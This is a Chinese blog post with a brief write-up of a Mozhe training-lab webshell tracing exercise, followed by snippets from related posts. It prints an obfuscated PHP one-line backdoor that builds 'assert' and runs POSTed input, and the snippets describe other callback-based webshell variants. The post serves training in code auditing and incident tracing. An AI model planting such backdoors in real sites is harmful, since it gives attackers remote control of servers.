墨者 - WebShell代码分析溯源(第3题)

最新推荐文章于 2024-03-08 18:22:40 发布

吃肉唐僧

最新推荐文章于 2024-03-08 18:22:40 发布

阅读量204

点赞数

分类专栏：墨者刷题笔记

本文链接：https://blog.csdn.net/qq_39936434/article/details/95649640

版权

墨者刷题笔记专栏收录该内容

95 篇文章 112 订阅

订阅专栏

下载文件，查看到有木马文件

这个是木马的变种

<?php
  error_reporting(0);
  $g = array('','s');
  $gg = a.$g[1].ser.chr('116');
  @$gg($_POST[get]);
?>

error_reporting(0);返回0报错提高代码的隐蔽性

然后翻译过开是

assert($_POST[get]);

接下来就是菜刀无惧链接

成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

吃肉唐僧

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

WebShell文件上传漏洞分析溯源

02-22

WebShell 文件上传漏洞分析溯源一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件（如WebShell）来获取服务器的控制权，从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...

墨者学院-WebShell代码分析溯源(第3题)

JimWu的博客

09-04

401

WebShell代码分析溯源(第3题) 难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、记事本、菜刀 1.访问网页，下载网页源代码。 2.审查后，能发现js文件夹里有个与众不同的文件，就是jquery1.42.min.php。 3.打开该文件，发现果然是变种一句话木马。 $g[1]=s chr('116')调用ASCII表，查找该表，知道116对应的是t 所以拼接起来就是$g...

参与评论您还未登录，请先登录后发表或查看评论

墨者学院 - WebShell代码分析溯源(第3题)

多崎巡礼的博客

07-31

794

$g是个数组，根据ASCll码对应表可以得到$g[1]='s'，chr('116')='t'，那么$gg=assert，@$gg($_POST[joker])不就是assert($_POST[joker])，组成了我们常见的一句话脚本运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key <?php...

360众测靶场题库之39-WebShell代码分析溯源(第3题)

zjl12344的博客

03-08

139

360众测靶场题库

墨者学院WebShell代码分析溯源(第6题)

vergilben的学习日记

04-03

9561

墨者学院WebShell代码分析溯源(第6题) 进入环境：下载并分析源码：在如上路径中发现pic3.jpg.php，打开如下所示：图中箭头指的很明显，是一句话木马，需要用到菜刀连接，但是后面很明显与base64有关，所以，我们需要一个指令来让它变成（xxx，一句话木马），思考一下这里应该是个插入语句，我们平常用到的，是eval函数，但我们看一下eval函数的解释：所以eval函数是无...

墨者学院 - WebShell代码分析溯源(第6题)

多崎巡礼的博客

08-03

452

审查代码，在图片文件夹中有php（有毒）使用了回调函数array_map（将用函数去执行每个参数，返回结果）、$_REQUEST、$_POST，通过分析，类似于第五题，用e来接受assert的base64加密的值作为函数，用POST作为密码使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST，key文件在/var...

墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)

最新发布

05-29

HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)

APP原型实例：墨者科技-旅行小蜜APP2.0.rp

12-17

产品经理

第30天：WEB漏洞-RCE代码及命令执行漏洞全解1

08-03

3. **检测**：通过静态代码分析、动态运行时检测和漏洞扫描工具，可以发现潜在的代码执行风险。 4. **危害**：攻击者可以通过RCE漏洞执行任意命令，获取敏感信息，篡改数据，甚至完全控制服务器。 5. **修复**：最佳...

0080 APP原型实例：墨者科技-旅行小蜜APP2.0.rp

01-06

rp原型源文件

墨者学院-WebShell代码分析溯源(第6题)

JimWu的博客

09-04

242

WebShell代码分析溯源(第6题) 难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、菜刀、记事本 1.访问网页，下载网页源代码。 2.查看每个文件夹的源代码，发现在/Assets/upload中有可疑文件，php文件想冒充jpg。 3.打开文件，发现果然是一句话木马。分析代码，了解到array_map属于回调函数。 base64_decode(e)为函数，e)为函数，...

墨者 - WebShell代码分析溯源(第6题)

吃肉唐僧的博客

07-13

249

下载文件，又是一番探索木马文件发现如下代码 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array($_POST['POST'],); array_map(base64_decode($e), $arr); ?> 这个也是一句木马的变种，获取url的e参数值（需要经过base64编码），链接密码是POST ...

360众测靶场题库之35-WebShell代码分析溯源(第6题)

zjl12344的博客

03-08

192

360众测靶场题

【墨者学院】WebShell文件上传漏洞分析溯源(第3题)

m0_66835614的博客

11-28

912

【墨者学院】WebShell文件上传漏洞分析溯源(第3题)

墨者学院 - WebShell代码分析溯源(第8题)

多崎巡礼的博客

08-05

726

审查代码 1、先找到黑页所在目录，观察同层级的其他文件命名和修改时间，选中可疑文件审计代码 2、没有新的发现，就去目录查找，根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php <?php error_reporting(0); ...

墨者学院 - WebShell代码分析溯源(第7题)

多崎巡礼的博客

08-05

691

代码审查在random_int.php 前排发现以下回调后门 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 <?php $e = $_REQUEST['...

【WEB】webshell回调php总结

HAPPY

08-19

4316

目录经典一句话利用简单的拼接字符串利用php回调函数等技巧绕过WAF的方法（姑且简称“回调后门”吧） 1. 利用 array_filter+base64_decode 2.利用array_map+base64_decode 3.利用uasort+base64_decode 4.利用array_walk+preg_replace 5.利用array_walk_recurs...

墨者学院-CMS系统漏洞分析溯源(第6题)

a519395243的博客

12-26

585

按提示先找后台，用御剑找后台后台地址 ip/servlets/ 在首页找到 mozhe777 用户，利用emlog博客的漏洞，错误不刷新验证码爆破密码用burp 爆破爆破出密码为 qwer1234 登录成功后，点击数据库栏目再点击备份数据库编辑备份下来的数据库，在末尾添加sql（新建emlog_shell数据表，向该表中添加小马，写入文件，再删除） dr...

php中$_request与$_post、$_get的区别

p_ython的博客

01-11

633

php中有$_REQUEST与$_POST、$_GET用于接受表单数据，当时他们有何种区别，什么时候用那种最好。一、$_REQUEST与$_POST、$_GET的区别和特点 $_REQUEST[]具用$_POST[] $_GET[]的功能,但是$_REQUEST[]比较慢。通过POST和GET方法提交的所有数据都可以通过$_REQUEST数组获得二、$_POST、$_GET的

墨者-sql手工注入漏洞测试

04-29

墨者安全团队是一支专注于网络安全领域的团队，他们致力于网络安全研究和技术推广。其中，手工注入漏洞测试是他们的一项重要工作之一。在进行手工注入漏洞测试时，墨者安全团队通常会通过一系列的步骤来进行测试。...